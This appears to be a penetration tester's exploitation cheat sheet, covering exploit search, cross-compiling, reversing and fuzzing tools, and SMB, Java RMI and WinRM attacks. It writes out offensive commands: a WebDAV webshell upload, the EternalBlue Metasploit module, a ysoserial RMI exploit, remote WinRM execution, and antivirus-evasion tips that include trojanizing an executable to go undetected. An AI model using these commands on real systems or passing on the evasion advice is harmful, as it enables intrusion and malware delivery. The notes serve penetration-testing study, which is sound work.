Intro to exploitation

How to find exploits

In Kali Linux:

searchsploit <SERVICE NAME>

Google:

site:exploit-db.com APP VERSION

linux-exploit-suggester.sh -k 2.6.9

windows-exploit-suggester.py -i <systeminfo file>

linuxprivchecker.py

NULL session

net use \\$IP\ipc$ "" "/user:"

WebDAV

cadaver http://$IP
dav:/> put webshell.aspx

Compilers

To crosscompile windows exploits in linux:

First install the package:

apt-get install mingw-w64

Command line for C:

i686-w64-mingw32-gcc -lws2_32 -o 100 100.c

Useful flags:

gcc -l ws2_32 -l mswsock

Command line for C++:

i686-mingw32-g++ main.cpp -o main -static

To obfuscate a python or bat script:

• py2exe: To obfuscate a python program http://www.py2exe.org/
• bat2exe: To obfuscate a BAT program

Reversing in Linux

Tools:

• ltrace
• strace
• strings
• binwalk
• radare2 (IDA for Linux) https://github.com/radare/radare2
• objdump

radare2

Useful commands for radare2:

is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i

egg-hunter

/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T

Buffer Overflow offsets:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4

Reversing in Windows

Tools:

• IDA Pro
• OllyDbg
• Immunity Debugger
• https://github.com/corelan/mona Corelan Repository for mona.py
• http://www.rohitab.com/apimonitor API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications

Reversing .NET

• https://github.com/0xd4d/dnSpy .NET debugger and assembly editor

Fuzzing

Linux

• sfuzz (kali)
• radamsa
• spike

Windows

AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.

• https://github.com/googleprojectzero/winafl

AV Evasion

• Veil: Encrypts/Encode/Obfuscate msfvenom-like payloads

Thanks https://twitter.com/ReneFreingruber/status/1031140505453842432 @ReneFreingruber

To remove ”/var/lib/veil” strings and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil

Other tools:

• https://www.obsidium.de/show/download/en Packer
• bat2exe
  Do a bat script with your trojan and use bat2exe to get an FUD to trojanize an exe or service.
  https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe
• Phantom evasion
  https://github.com/oddcod3/Phantom-Evasion
  Interacts with msfvenom.

SMB exploitation

Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):

use exploit/windows/smb/ms17_010_eternalblue

nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24

References:

• https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

Java RMI exploitation

Nmap will recognize it as:

XXXX/tcp  open  rmiregistry       Java RMI

Exploiting RMI

With nmap:

nmap --script=rmi-vuln-classloader -p 1099 $IP
nmap --script=rmi-dumpregistry -p 1099 $IP

With metasploit:

use exploit/multi/misc/java_rmi_server

With ysoserial:

java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe

With java monitoring and performance console (OS performance and application parameters):

jconsole

WinRM exploitation

Commands:

winrs -r:$HOST $CMD
Test-WSMan -ComputerName $HOST

More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/